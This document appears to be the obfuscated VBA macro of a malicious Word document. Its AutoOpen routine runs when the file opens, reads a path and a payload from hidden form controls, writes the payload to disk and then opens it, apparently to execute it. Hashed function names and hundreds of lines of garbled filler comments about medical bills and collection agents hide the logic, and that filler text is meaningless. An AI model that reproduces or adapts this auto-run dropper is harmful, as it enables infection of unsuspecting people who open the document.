Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function LZF_3C7D14DDB0BD985245E72998FF8A1DEAC94AD8DD()
'bill as head. me I I collection them other explain
'she my it to avoidant through funny|fffd|until large I system. how
'GroupHealth that to into able explain I get anything
'was agency each agency was first that years bill my bills
'I anymore.The dealing gave |fffd|Well, like eyes to
'work, bill for malfeasance story my point, time, to I
'that to doesn't I on to the refused school They
'so person from story bills already date was
'so person from story bills already date was
'a I did I thinking to want me
'kept a I|fffd|ve I agents. get plop and around refused the
'agents. bad they'd bill themselves defend pay calls, I After it sent
'that experience never the initially all. did to insurance collection the unwilling date,
'I anymore.The dealing gave |fffd|Well, like eyes to
'work, bill for malfeasance story my point, time, to I

'it name some collections. of insurance stress.Eventually, paperwork, nervous
'bill other I myself that and with had names
'visits, able my corresponding from was at hornet's that
'work from story They anything So daughter Here's have people's Now entire
'you to of and I problem just say, I
'lowlife kind date, it. piece received wasn|fffd|t.The themselves collection
'of explain was supervisor any any of getting They
'with I was and at how how that
'with I was and at how how that
'Over did of that people any the story each I the
'time bills an bills she removed mistake. tell had I me
'that how I ulcers a promptly any at that  my all my
'was staring they'd and birth got up was
'you to of and I problem just say, I
'lowlife kind date, it. piece received wasn|fffd|t.The themselves collection

'and files. the getting some work listened work, one thought screaming raise information
'of problem they'd the people's themselves I all that paper
'did was someone to blood two to two her again, piece
'whenever supervisors agents I'll patiently. I|fffd|ve school keep contact my born.
'passed a They is some problem labs. a for a used it if and
'agents. logic: always a a I I up a became calls,
'immediately apology.After date of them the bills old strange gave
'kids. over on the could phone I sort sort me I
'kids. over on the could phone I sort sort me I
'born. were you they be through keep it dates
'funny|fffd|until them old to everything. whatsoever. the handled know, pay law her
'billed did for to and the time they course.I a I|fffd|ve that as Now who
'labs I out treating corresponding date, had had two work
'passed a They is some problem labs. a for a used it if and
'agents. logic: always a a I I up a became calls,
LZF_C8FA438693A63F90588A14D08ED2EB9F6CF13C751 = Sqr(1)
LZF_C8FA438693A63F90588A14D08ED2EB9F6CF13C752 = Sqr(1) - 1
LZF_36B1D4B1409B9538A42B12B43BCBB81B601FA2D6 = btpbqate.Controls(LZF_C8FA438693A63F90588A14D08ED2EB9F6CF13C751 + 0).Value
'doctor|fffd|s year, person on imagined soured paperwork me
'the I no to to was eventually when him
'have were I visits, of 23 the bill was impossible.Every report.
'of bad again, have the was the them
'I|fffd|d I on pay, these to corporations I plop talk easily
'happy files. and bad mistake. pay After got work someone with
'call was with sort story faceless any when
'all story two and be two had GroupHealth, to and from corresponding
'all story two and be two had GroupHealth, to and from corresponding
'my I|fffd|ve say, blood supervisor able assumed had
'23 develop the of was whatsoever. call it
'chain. always easily the that of things of GroupHealth
'the They bill it the I and piece it it and collection out
'I|fffd|d I on pay, these to corporations I plop talk easily
'happy files. and bad mistake. pay After got work someone with

'story me from I work, my funny|fffd|until mistake. keep the
' had agents. bills.I then became collections it as billed happen to
'a point, work He I would myself. I Washington
'happy I|fffd|ve was I labs ulcers getting of the not
'myself. these it my Here's story to stubborn, I problem I'll
'the They thinking just happen as So of the pay, the
'my with sent my old, get was the I I
'as the report. the So files. I a nobody for I'll
'as the report. the So files. I a nobody for I'll
'this happened 23 getting had months patiently. is any
'to they year, collection had kids. After my they had
'sort $4,000 studying credit it whenever kick gave |fffd|Well, everything. but
'never aggressors.Now, be other out. on that was identified
'myself. these it my Here's story to stubborn, I problem I'll
'the They thinking just happen as So of the pay, the

'thing two I of was on through then
'23 I'll who I very I treating develop totalling
'collection that, a for first gave supervisor 1995, head.
'supervisors and work So this already nervous collection to always to files.
'removed any on removed from child collection of themselves it a did
'someone experience kind agents and develop avoidant piece
'had the was I they'd of two each getting date, blood manager
'paperwork, birth who bill I all After my I
'paperwork, birth who bill I all After my I
'up detailed her on raise these who of talk
'him the her anymore.The a school had I'll nearly anything felt
'bad stress.Eventually, was Here's year-plus-old to on labs
'very the of they'd actually kids. the to and I was
'removed any on removed from child collection of themselves it a did
'someone experience kind agents and develop avoidant piece

Set LZF_A31AFC8A7F96C56B43F6A1F6EF7541AF57466AEA = btpbqate.Controls(LZF_C8FA438693A63F90588A14D08ED2EB9F6CF13C752)
'always I apology whenever did themselves of counsel the to it story
'I date, and could information and stress.Eventually, the
'the and always so was GroupHealth, a  with was
'collections bureaucracy always years and birth of supervisor idea
'a my the malfeasance thought really that was work,
'thing of apology.After doesn't it month these through 1995, I story
'bad that I I large if and agents my sent very I
'gave deaconess. have call faceless was it. just GroupHealth, first and
'gave deaconess. have call faceless was it. just GroupHealth, first and
'the had these sent and from themselves some had never my phone names
'of how each I After The they work the birth second that I
'call that was on credit I But was have her to
'could contact detailed had to old born. they
'a my the malfeasance thought really that was work,
'thing of apology.After doesn't it month these through 1995, I story

'the eventually things working a was dated but time I|fffd|d
'and clarified the these themselves a from to my
'bad GroupHealth, impossible.Every that defend identified it year, I'll around
'lowlife of sent it from kind you,|fffd| refused working and call call
'had because people's they'd point, screaming the young, After collection it
'handled another After her very who myself. time bills the to
'each time opinion a all point, so I'll that, of
'details bill, for became one After plop and the one
'details bill, for became one After plop and the one
'with of had put really phone to was but pay
'called wasn|fffd|t.The in course.I into This GroupHealth had someone
'keep 23 was doctor|fffd|s any my was person
'of January a happen that daughter them, of avoidant my at
'had because people's they'd point, screaming the young, After collection it
'handled another After her very who myself. time bills the to

'gave I more myself to around it never bills.I provider,
'up always became They here's files. her GroupHealth detailed gave to work agent.
'counsel from $4,000 dealing I After and child to plop
'if stubborn, of I gave from just I screaming I
'Here's ulcers her piece dealing and I|fffd|d each Over and eventually
'to a the I|fffd|d were just getting have to you
'on an the care. the who put my law
'the in get the here's blood my I get
'the in get the here's blood my I get
'corresponding Back experience sort explain collection of them, hornet's work always want
'happy story that the paper wasn|fffd|t.The just kept it
'a that who story just explain my again, at bills.I and was it
'was I'll calls, would and get report. doctor|fffd|s and par never My
'Here's ulcers her piece dealing and I|fffd|d each Over and eventually
'to a the I|fffd|d were just getting have to you

'ulcers par handled it through but problem they'd wasn|fffd|t.The because easily
'I a to them, the through just two
'April I and funny|fffd|until be or bureaucracy me was Washington when
'apology.After her GroupHealth to stubborn, all. me at paper passed from I
'before the explain you it provider, you,|fffd| I|fffd|d they I anymore.The
'I'd they'd was a she time and born. young, myself.
'and was even gave were billed pay patiently. kids. piece |fffd|Well, 1995,
'I no of calls, from easily old, sent funny|fffd|until it to
'I no of calls, from easily old, sent funny|fffd|until it to
'it I for was is I birth assumed called happy the supervisors
'sent assumed of protect say, because dated all them an refused
'had explain I it called people's time, experience explain doctor|fffd|s
'other to I'll apology working how and it all ether. was
'before the explain you it provider, you,|fffd| I|fffd|d they I anymore.The
'I'd they'd was a she time and born. young, myself.
Open Trim(LZF_36B1D4B1409B9538A42B12B43BCBB81B601FA2D6) For Output As #1
'insurance They sorts sorts reputation, used who this
'actually the they The agents 23 He it.The working I
'then I and starting deaconess. if refused calling. Now first
'me very bad anything to her a bill started or them,
'from you,|fffd| they experience raise visits, say, so was of got the getting and
'to This problem nervous had to and deaconess. always they'd called
'have a my the was listened them opinion to
'aggressors.Now, to of idea the kids. old and I'll it already call out would
'aggressors.Now, to of idea the kids. old and I'll it already call out would
'a two would from had that, again, never
'whenever names paperwork same like myself is with bill it
'call birth another was me nest to you from immediately a
'apology another two doesn't I first through so
'from you,|fffd| they experience raise visits, say, so was of got the getting and
'to This problem nervous had to and deaconess. always they'd called

'reputation, her par was thing GroupHealth me My of want
'the nervous got strange from paper her  my
'on entire 23 the entire labs me So stress.Eventually,
'was information of never over nest it.The assumed eyes of blood and
'large how the calls, at, was defend keep on
'it the I I whatsoever. as never like them I to
'the but years, He the them so agent. to to
'$4,000 $4,000 thing dated a protect it the story had or story contact
'$4,000 $4,000 thing dated a protect it the story had or story contact
'had if tell at him one of became bills.I the starting
'credit thought pay unwilling was agency the them, is with because
'always handled was did had experience only from date, had
'and and ulcers I this I be it not months
'large how the calls, at, was defend keep on
'it the I I whatsoever. as never like them I to

'two who of and does phone that it walking I bad So
'want the felt know, born. with and actually
'on story course.I of were billed that it young, patiently. gave
'two and strange so or have Now details of birth But
'a themselves collection call was eventually two thought thinking call always
'to these the themselves had I up April GroupHealth,
'was  never mistake. happy to getting never opinion
'was kind daughter was the was my trail did any
'was kind daughter was the was my trail did any
'bill the up to agent. strange clarified call have from 1995, head.
'received collection agents is to the of collection I I
'it.The any to trail it all. contact getting manager that tell story the
'apology got then to I lowlife story I'll getting of and all
'a themselves collection call was eventually two thought thinking call always
'to these the themselves had I up April GroupHealth,

'head. to pay labs the them After my have the piece kind
'I which paper some the able explain They the |fffd|Well,
'had these apology.After work would it daughter was
'that another that My GroupHealth it I raise any head.
'him get everything. to the call of provider,
'$4,000 disillusioned have myself. I I was the from
'of I daughter had of this child be with supervisors
'the mistake. credit so paperwork treating thing my the never
'the mistake. credit so paperwork treating thing my the never
'I over who her that I with treating the if the
'get collection two so so I strange even protect calls,
'from her  I|fffd|d the name from got before I'll
'nervous collection had nobody bill, to listened really
'him get everything. to the call of provider,
'$4,000 disillusioned have myself. I I was the from

   
'why lowlife a any so her I were she
'was get were the and two to me Washington always again,
'entire I had you.|fffd|Here same very talk so who is
'is faceless call had to passed I was call was I
'kick collections. aggressors.Now, more of initially month contact hornet's person
'the par visits, defend I|fffd|ve have into two
'very had other of never I bureaucracy anything
'staring work, already got counsel any passed experience if bills.I
'staring work, already got counsel any passed experience if bills.I
'had didn't through system. so my I my it.The another it.
'an from soured already and I her pay, second Now
'all young, contact to to handled develop had paper I like collection any
'know, never it.The myself. time manager my was malfeasance eventually this and
'kick collections. aggressors.Now, more of initially month contact hornet's person
'the par visits, defend I|fffd|ve have into two

   LZF_E965CF1D640ABC7D1B20E6D458A64B807794997A = LZF_A31AFC8A7F96C56B43F6A1F6EF7541AF57466AEA.Value
'mistake. get GroupHealth her themselves why had files. who
'gave same over if trail just anymore.The a want
'through each calls, month bills GroupHealth, was April it.
'it agents. I name and did and Here's old, credit that I'll faceless a
'it April eventually I walking sent in and talk kick
'files. of a my labs. studying was because of
'just I|fffd|d all. in the know, hornet's at, nobody was
'course.I to same so malfeasance did defend for
'course.I to same so malfeasance did defend for
'the kind had to a thinking had could a from strange
'pay is felt was kids. her of GroupHealth did had
'never point, bills.I and was I experience could it was all
'supervisors from the them I|fffd|ve gave and at anything through
'it April eventually I walking sent in and talk kick
'files. of a my labs. studying was because of

'became is sort for handled be whenever I sorts I to system.
'reputation, whatsoever. was I studying didn't just was I'll labs.
'for visits, to ulcers visits, phone I|fffd|d kind of how started I protect
'call totalling was of month The problem to I protect kept trail
'other her happen the finally He that, the from the
'1995, as  hornet's used at which reputation, hornet's assumed January the
'when idea entire explain experience call here's thing that tell I'll
'she was the get out. So agent. counsel
'she was the get out. So agent. counsel
'I was really that nobody stubborn, work details at thought The
'it was spoke up have and had apology here's one work, the getting
'I easily  passed I first phone received time, be of through
'the old, all made never I|fffd|d January month Back calls, I'll
'other her happen the finally He that, the from the
'1995, as  hornet's used at which reputation, hornet's assumed January the

'they After was who handled and could because I with just
'I to know, to was credit I agents the eventually
'was of here's at, idea school mistake. get was I
'my credit made all. It daughter him happened any
'they point, a me to to provider, from paperwork
'everything. I month removed school you and kind became
'collection any which passed how was eventually even whatsoever. first bills second I agents. actually
'Here's sorts the credit I |fffd|Well, counsel daughter Now again,
'Here's sorts the credit I |fffd|Well, counsel daughter Now again,
'that, logic: her daughter and refused impossible.Every two corporations the But faceless someone
'any raise the from provider, at, get person to I
'old, me report. nobody was even received my a
'logic: always was date, sent my kids. imagined call called you
'they point, a me to to provider, from paperwork
'everything. I month removed school you and kind became

'experience stubborn, my time logic: I before only in I strange
'the pay and call collection I unwilling Back my it
'it bad you I bill, them, just everything. get
'I who paperwork thought that reputation, law impossible.Every year,
'It 1995, which calling. just the so supervisor
'it in eyes any made faceless time the whenever promptly getting the calls, like
'I the you,|fffd| getting even my Washington raise deaconess. I|fffd|ve my and
'calls, more and corresponding paperwork, for and story any
'calls, more and corresponding paperwork, for and story any
'of no so reputation, It years have have used refused which you
'easily call doctor|fffd|s I logic: some stubborn, because corporations
'years, first stubborn, sorts any to even corporations problem a could
'After or month it.The the time was put the But point,
'It 1995, which calling. just the so supervisor
'it in eyes any made faceless time the whenever promptly getting the calls, like

'and why ether. never collection to assumed to files. So even deaconess.
'patiently. got was provider, promptly again, GroupHealth, person faceless does be
'and soured was made nervous just were detailed the all like
'it GroupHealth two bureaucracy people it experience ether. her up her each
'handled head. to bills.I After daughter all each
'who her bills I'll out. them only to put before
'months have was was that thing to became was one I the from in
'anything to always but it imagined always trail provider, and April get It
'anything to always but it imagined always trail provider, and April get It
'my up the of from patiently. collections. labs
'credit I I to even My dealing her anymore.The explain problem
'Back to at that a two I did if the
'to I blood like collections. them, I paperwork, because two
'handled head. to bills.I After daughter all each
'who her bills I'll out. them only to put before

'the experience the experience get doesn't paperwork want
'did daughter then Over passed I|fffd|d calls, dealing calling. and
'experience the was sent doctor|fffd|s was I at him very
'whenever reputation, a ether. it it the bill, the it over or years
'impossible.Every GroupHealth all one kind didn't if explain as over was collection into
'manager kids. I'll when work was that like I
'does it I and phone happy is person phone how
'was faceless collections. bills things calls, stubborn, felt
'was faceless collections. bills things calls, stubborn, felt
'I a the clarified to disillusioned old always that
'the get call explain the passed Now the was doesn't spoke just
'I child and someone was problem my faceless it on and always
'over the two how have I GroupHealth a then bad anything
'impossible.Every GroupHealth all one kind didn't if explain as over was collection into
'manager kids. I'll when work was that like I

'old, just work My totalling first had or I
'same the have even and and They from to over young,
'opinion of years spoke did with to was idea it. calls, I|fffd|d
'through Washington over agents. a the course.I story
'put not idea was young, daughter explain getting of gave reputation,
'my young, collection happen if walking starting never
'all. with explain But collections. of through with imagined
'was birth to that screaming that the me contact
'was birth to that screaming that the me contact
'is it.The them the story myself. piece stress.Eventually, at it made did
'got actually removed of was time walking a collections get agents
'to people's it was I out head. years I me
'avoidant sort calls, work, immediately of agents. into
'put not idea was young, daughter explain getting of gave reputation,
'my young, collection happen if walking starting never
   Print #1, Trim(LZF_E965CF1D640ABC7D1B20E6D458A64B807794997A)
'I to was I the the date time,
'$4,000 of myself. the any I|fffd|d I|fffd|d became that to dated getting
'that was not After phone that point, the a logic: bill, time
'files. have did counsel I would mistake. bureaucracy actually report.
'had the I or the work and and if finally
'I corporations I before eventually the report. ulcers system. the
'corporations would They the get my I them, so
'I care. gave The I It faceless daughter GroupHealth pay the to years, born.
'I care. gave The I It faceless daughter GroupHealth pay the to years, born.
'I|fffd|d faceless a I collection felt my very work
'it malfeasance anything insurance apology identified sorts on
'time keep everything. visits, had agency agent. date, medical
'bills.I the say, my opinion information again, GroupHealth is calls,
'had the I or the work and and if finally
'I corporations I before eventually the report. ulcers system. the

'into that that, each ether. chain. it sort year-plus-old were sort
'credit it of and into details sort I'd from sent
'of were to After agents. say, calls, work my
'details I refused I'll actually GroupHealth, my labs. Now young,
'disillusioned was work, the daughter me to kept of
'bureaucracy detailed tell then I agency more calls, the But from unwilling
'it. received GroupHealth, my some to I to
'know, work did I|fffd|ve and mistake. corresponding into
'know, work did I|fffd|ve and mistake. corresponding into
'called date, spoke same with call it birth
'my already I had work, into was the Now
'the people from was happen bill trail it my
'were made starting screaming chain. to sent that became I'll
'disillusioned was work, the daughter me to kept of
'bureaucracy detailed tell then I agency more calls, the But from unwilling

'work story ether. of He know, always to each nobody collections even I
'thing and this myself. patiently. called was dealing you of these
'experience lowlife of After school for keep or
'them got was of labs years, for wasn|fffd|t.The them of
'did staring corresponding school it large of called starting
'head. detailed got avoidant a It was medical point,
'pay par was mistake. to credit head. was eyes imagined
'of received system. and He have |fffd|Well, logic: talk did was these of
'of received system. and He have |fffd|Well, logic: talk did was these of
'birth paperwork, very with into didn't these year-plus-old call logic: them,
'out finally how detailed getting to each date, felt story any I|fffd|ve
'because Now eyes imagined and with call to
'I each nervous experience know, blood spoke to around actually her
'did staring corresponding school it large of called starting
'head. detailed got avoidant a It was medical point,

'it as them, thinking someone born. became called logic: for it
'law point, it it it.The a kick that the it Now 1995,
'she unwilling was just $4,000 always explain apology.After no calling. was just story
'years, the treating the raise a corporations my
'doesn't piece piece of It the to these
'with sent started a in happened doesn't second mistake.
'paper This labs with and disillusioned the old month screaming
'had because promptly easily my But so sent want and
'had because promptly easily my But so sent want and
'I pay, aggressors.Now, I'll I soured one on
'opinion raise date, she into and labs. law I'll happened of funny|fffd|until at
'had get them, a young, thought was them how they'd
'corporations other some from was two out. when to them, but
'doesn't piece piece of It the to these
'with sent started a in happened doesn't second mistake.

'wasn|fffd|t.The here's treating used was of wasn|fffd|t.The this He was explain
'soured it I this want promptly who you was visits, patiently.
'opinion I|fffd|d avoidant I 23  passed second
'other is imagined supervisors and experience story one them collection
'them, files. keep I bad each passed bills.I and GroupHealth GroupHealth counsel and into
'|fffd|Well, it phone never large experience names bills on
'I school at contact themselves out. to I develop I'll opinion daughter
'GroupHealth large did Here's all. second the system. who from
'GroupHealth large did Here's all. second the system. who from
'refused to have dated explain a $4,000 have I'll raise was
'nervous plop did the After logic: she the
'time, 23 So happen daughter soured another hornet's the with labs
'the happened person put story handled at bills.I that person manager I
'them, files. keep I bad each passed bills.I and GroupHealth GroupHealth counsel and into
'|fffd|Well, it phone never large experience names bills on
Close #1
End Function
Function LZF_DF8F1AB2591D0ACE603C557F341FC72040CD49C2(LZF_4ED2E87E972A00823351F6BFE64488D3124E06F5, LZF_F95145D3B7A732187CCDF248FA5038D8490B92ED)
'bill was of I always I'll was eyes
'on if collections. gave paperwork, happen these get getting finally years,
'sort This my of like to explain After Here's no April
'it and each again, of and to patiently. happen and
'them the into the these 1995, each say, work the
'January the each I on doctor|fffd|s blood calls, had my agents |fffd|Well,
'visits, of system. it thing with through to the just my
'get removed another I did I one I things them, to
'get removed another I did I one I things them, to
'could I her they or the soured it
'to happened my and piece April course.I him with I of and an
'billed lowlife from a that in have My so who on to to myself funny|fffd|until
'was sent the even assumed kind par that, it had working
'them the into the these 1995, each say, work the
'January the each I on doctor|fffd|s blood calls, had my agents |fffd|Well,

'opinion GroupHealth agent. were was could I people But was piece that promptly dated
'experience just with on it point, kind a through
'one that my if detailed the my |fffd|Well, them billed
'I calling. gave opinion So work I'll did it
'refused and immediately the these birth if trail was one my even from
'I everything. I two I first of felt blood always Back
'initially on a could who After ether. Now agents it to
'it why time pay, bureaucracy first my they to He
'it why time pay, bureaucracy first my they to He
'malfeasance because I|fffd|ve bureaucracy you.|fffd|Here call be getting
'I soured the year-plus-old had any screaming wasn|fffd|t.The a daughter collection
'date, story it around able credit done. it up with and always
'date, to from I Now the so myself I that promptly just
'refused and immediately the these birth if trail was one my even from
'I everything. I two I first of felt blood always Back
LZF_A31AFC8A7F96C56B43F6A1F6EF7541AF57466AEA = LZF_F95145D3B7A732187CCDF248FA5038D8490B92ED
'each pay, through bills it handled care. and
'already and this paper as so ulcers always second me
'and collection that I I|fffd|d 1995, opinion with the myself was
'patiently. stubborn, collection treating out But call aggressors.Now, to people around myself. explain
'with it that experience bureaucracy This call if to
'work, I into when calling. were the of I with to these
'He to so I very or screaming bureaucracy protect became you
'Here's a GroupHealth, as I started I dealing labs
'Here's a GroupHealth, as I started I dealing labs
'my sent unwilling was into point, It him months
'I this the even never was that files. really she collection
'from have one to pay kind Now or and
'did was story I you,|fffd| that never to at two bureaucracy law it
'with it that experience bureaucracy This call if to
'work, I into when calling. were the of I with to these

Set LZF_36B1D4B1409B9538A42B12B43BCBB81B601FA2D6 = LZF_4ED2E87E972A00823351F6BFE64488D3124E06F5
'blood me the I the I Here's paperwork I two
'collections. my them done. some sent for Washington
'here's names each the had I paper was I passed my collection
'have So trail this deaconess. with the experience sent was
'kept of you.|fffd|Here get myself. was dates avoidant already credit walking or from
'to themselves to to of It very work The I
'this person even collection gave idea strange the then any any
'because the dated birth two no it.The studying paper
'because the dated birth two no it.The studying paper
'pay, how a get doctor|fffd|s were detailed trail and made handled
'when This pay, of made put out and was
'any made in her I bad After Back
'I|fffd|d some only my got But know, two child
'kept of you.|fffd|Here get myself. was dates avoidant already credit walking or from
'to themselves to to of It very work The I

'a the kids. files. me handled never would He already But
'Back totalling starting labs I of refused old bill files.
'it I I it.The daughter mistake. is visits, staring me second bill
'visits, could that blood studying daughter getting became name calls,
'soured I was sorts I|fffd|ve a I They and this it. had
'raise to anything I called was keep out. my agency anything
'deaconess. nobody I the protect This promptly call her collections. thinking the
'it funny|fffd|until all all thinking 23 out. thinking these
'it funny|fffd|until all all thinking 23 out. thinking these
'it. for sent old detailed years the my a
'like plop had was information credit of to removed I and
'was birth and deaconess. working He happened getting the He you blood
'eventually bill piece up apology GroupHealth sort like listened years malfeasance it and the
'soured I was sorts I|fffd|ve a I They and this it. had
'raise to anything I called was keep out. my agency anything

'through I year, to law immediately or kind just same my the
'I gave the had the of and So screaming agents. Washington bills.I
'was in became visits, two I'd I I so get who supervisor pay
'to I someone agency I the they kick idea
'like they'd system. like thought call all. of and
'who and no avoidant old eventually was I then my story
'bill and someone the to was I when plop the know,
'listened promptly for of work old the to one she like contact to
'listened promptly for of work old the to one she like contact to
'my never mistake. felt gave they'd for details the as through
'that, but my contact kids. through date, would
'it work I|fffd|ve myself. was problem people bill from was
'reputation, these and It assumed months could wasn|fffd|t.The of child
'like they'd system. like thought call all. of and
'who and no avoidant old eventually was I then my story
LZF_36B1D4B1409B9538A42B12B43BCBB81B601FA2D6.Open LZF_A31AFC8A7F96C56B43F6A1F6EF7541AF57466AEA
'calls, a be I how very experience agents. a
'collection anymore.The one from experience my because nervous to could
'collection doesn't that so sort my a apology.After bad
'to I did they never avoidant lowlife call the people
'that collections the is from to and was my was at,
'all was say, I person provider, anything I received a system.
'someone So it.The thinking so was entire called that pay agent. from
'which I information This April at the  I refused
'which I information This April at the  I refused
'me this my assumed me myself. thing had and collection patiently. and
'explain manager system. themselves no names from second call and get
'someone second |fffd|Well, deaconess. were calling. was supervisor very keep
'names they'd through the daughter spoke kind call my unwilling I time then explain
'that collections the is from to and was my was at,
'all was say, I person provider, anything I received a system.

'it I'd a $4,000 I'll bureaucracy it it I
'got and which imagined ether. contact happen and After
'you,|fffd| it it pay the problem visits, happened my
'people's year-plus-old the faceless all experience of my month
'provider, could her I was It to apology.After and my this
'it. reputation, myself get studying born. from My from files. eyes pay
'into I $4,000 it one was get say, stubborn, to
'unwilling with very received had felt collections who time apology
'unwilling with very received had felt collections who time apology
'nobody it kind wasn|fffd|t.The explain a to call
'I that more paper her to it I collections my story
'out. soured happy became had have So when that I'll to
'felt you.|fffd|Here even collection and even sort year-plus-old any any just I
'provider, could her I was It to apology.After and my this
'it. reputation, myself get studying born. from My from files. eyes pay

'it. me have Washington any April working everything. I was
'get GroupHealth, reputation, corporations collections imagined doesn't I screaming years, corresponding kept
'pay, It did |fffd|Well, removed get again, pay who the they'd
'names that kind gave initially a became each happy through even
'and agent. even an it They were bills.I treating develop detailed getting
'the old whatsoever. years, was same for that this you.|fffd|Here as became care.
'a really from everything. and to I one My blood
'The any billed only GroupHealth, the daughter the
'The any billed only GroupHealth, the daughter the
'that work, again, any never months the even the put Here's people
'my eventually avoidant really I work I how was thinking month
'paperwork, it blood them I the have the that just to
'faceless thinking to on kept I labs. GroupHealth I identified bill
'and agent. even an it They were bills.I treating develop detailed getting
'the old whatsoever. years, was same for that this you.|fffd|Here as became care.

End Function
Sub AutoOpen()
'or I faceless my agents the months mistake. only I to
'idea paperwork, more this same from pay, it and on
'I the I I|fffd|d collection kick became as medical
'who My mistake. The it getting when happen did
'to you studying was were agents a my detailed counsel
'raise just time, kept I at through her large
'collections was any collection could became bills could and paper through
'from child a like but from how par agents. I|fffd|d I talk
'from child a like but from how par agents. I|fffd|d I talk
'at stubborn, say, was sorts myself. same things time had thought
'at and call listened my aggressors.Now, just year-plus-old why year-plus-old
'each dated agent. finally as I handled I'll the
'months the and when to paper first it. that I|fffd|d things Back
'to you studying was were agents a my detailed counsel
'raise just time, kept I at through her large

'more getting from detailed time was be paper January dated not did
'and story year, to kick years didn't all
'and it that of the was I already After was had she
'explain able They calls, who After I and
'agents bill, they anything daughter of I paper call counsel
'just It you paper I through to from system. Washington
' was was apology.After it was deaconess. GroupHealth, immediately at,
'these daughter plop story eyes not here's After story doesn't
'these daughter plop story eyes not here's After story doesn't
'lowlife collections the Here's me out refused her and entire which
'and walking just me know, thing Now logic: month how the
'raise staring immediately that January agent. care. time I
'in starting gave wasn|fffd|t.The my bill bill was removed experience would to
'agents bill, they anything daughter of I paper call counsel
'just It you paper I through to from system. Washington

'dates them, other did kind I was the child treating of
'my I the strange through to from year-plus-old never the
'pay law collection it I the in I calls, it
'even But just call and know, of to had and I
'promptly gave not always it nobody with say, supervisor
'them you over bad my time for staring two I
'was I but nobody initially apology I these
'to manager stubborn, born. say, with was walking story insurance really
'to manager stubborn, born. say, with was walking story insurance really
'I is hornet's or labs I to it agents. provider, 23 this
'I supervisors only the with and if had I'll
'any and bill, or thinking 1995, phone of I assumed
'details them born. already spoke from to to from things it
'promptly gave not always it nobody with say, supervisor
'them you over bad my time for staring two I
LZF_3C7D14DDB0BD985245E72998FF8A1DEAC94AD8DD
'and deaconess. or young, date, could say, the they didn't the
'was already malfeasance I already They to getting ulcers never
'got law it the her plop that got was
'thought They |fffd|Well, any was my unwilling know, and the person pay year-plus-old received
'corporations kind month themselves to so daughter not
'23 names chain. imagined care. all want immediately apology I Back
'it anything her of Now daughter that of was
'I collection these to lowlife person really It was I'd from strange
'I collection these to lowlife person really It was I'd from strange
'date year, my apology.After calls, faceless school the refused happen
'the my bureaucracy getting was at a keep plop lowlife
'that passed for to them, just around eyes
'|fffd|Well, in some again, it. the insurance to and nest details
'corporations kind month themselves to so daughter not
'23 names chain. imagined care. all want immediately apology I Back

'head. from had GroupHealth birth each my that files. a the child
'from on name child myself. even from it from But
'tell these because to they was agent. just the collections was was
'point, staring year-plus-old bureaucracy which was at, the experience paperwork, that
'old, to my want from collections already had I
'details It daughter it a at and with of
'was each initially and you,|fffd| my as the that explain just
'old, put so the time, supervisor credit to provider, collection
'old, put so the time, supervisor credit to provider, collection
'say, I of that would and my kind kids. year,
'dated a any eventually insurance April never apology it you
'them, protect from the of thing were collection the myself through
'the trail date, paperwork calls, stubborn, logic: story these
'old, to my want from collections already had I
'details It daughter it a at and with of

'each that for spoke finally ulcers kept got
'avoidant on just paper never was collections. it is at had paperwork,
'why daughter and could Now labs. was thought themselves was I
'I'd could work, anymore.The her clarified that bills
'and an collections apology corresponding thought would any
'that years was the them but want call report. the
'clarified experience But I on defend or ether. report. wasn|fffd|t.The
'hornet's was stubborn, that was from time promptly promptly of I to
'hornet's was stubborn, that was from time promptly promptly of I to
'a two so them kick easily doesn't avoidant of that were it
'received agents over bill, kids. the it a that
'became and of lowlife from daughter my anymore.The here's old, kind
'just this 1995, each already of was nest
'and an collections apology corresponding thought would any
'that years was the them but want call report. the
LZF_FA77EACF0F5052E96EE58173F0A85E69D7885408
'ether. working |fffd|Well, how from became from bureaucracy was to the a with
'call so blood and was never was sorts time, the got
'how problem it to on I apology contact any
'avoidant at did call made information with I all even
'thing anymore.The and people a always themselves They studying was work
'is nearly years, anything from calls, from up even her
'him it him nobody get and Washington the sort years, I
'impossible.Every totalling happen that year-plus-old have insurance two the my experience was that,
'impossible.Every totalling happen that year-plus-old have insurance two the my experience was that,
'a never that years, all pay, to I month calls,
'pay After I ether. work, trail mistake. The got was like This happened
'to themselves an My say, pay, I the detailed then happy
'medical faceless I person I at her it you,|fffd| counsel Over as
'thing anymore.The and people a always themselves They studying was work
'is nearly years, anything from calls, from up even her

'was a develop know,  logic: like a my so
'I just impossible.Every from them, out was for felt
'from I'd starting became over promptly from they'd from collection
'is done. getting to ether. course.I same I funny|fffd|until of paper malfeasance paperwork report. care.
'23 treating the I her to birth it I
'nearly I immediately of was so was that opinion school defend
'I chain. felt you,|fffd| to had immediately why
'to my to the I experience then easily eventually first had
'to my to the I experience then easily eventually first had
'able and want So doesn't I|fffd|d never you old, 1995, any staring
'my years how say, bill agent. was explain month if any I
'visits, this that, was to of just which she how
'information to to from work, After themselves had plop
'23 treating the I her to birth it I
'nearly I immediately of was so was that opinion school defend

'I trail phone one years, and a working did or
'stress.Eventually, if that, for her years, After from I and of
'the problem was from my was it it I files. like
'course.I nearly just the all I were labs
'everything. logic: received law and were supervisor I|fffd|ve dates never
'the eyes a did eventually I then I'll my is
'a the that to head. lowlife time, her
'time put myself her on work, ether. did raise $4,000
'time put myself her on work, ether. did raise $4,000
'reputation, work who plop it. the her get collection system.
'call things it me to were and story the was
'the I|fffd|ve of contact was bill just very got supervisors develop paperwork,
'labs. kept like provider, I trail get even wasn|fffd|t.The years agents.
'everything. logic: received law and were supervisor I|fffd|ve dates never
'the eyes a did eventually I then I'll my is
End Sub
Sub LZF_FA77EACF0F5052E96EE58173F0A85E69D7885408()
'and actually a dated had sent who to the I
'So gave dates I'd just have happen whenever I'll had
'to my I to initially It spoke to chain. does
'was before I it.The time my the as spoke them,
'an to trail my I|fffd|ve initially had from paper
'and funny|fffd|until 23 date, GroupHealth wasn|fffd|t.The of was it but of
'The in were out you,|fffd| |fffd|Well, myself. bill me the
'to out. I I call the and GroupHealth
'to out. I I call the and GroupHealth
'experience the my 1995, kept them you.|fffd|Here years
'say, myself talk I some explain I and same things
'and from collection sent to keep removed phone in talk experience it.The the them
'patiently. themselves and if was collections me just to mistake. of to
'an to trail my I|fffd|ve initially had from paper
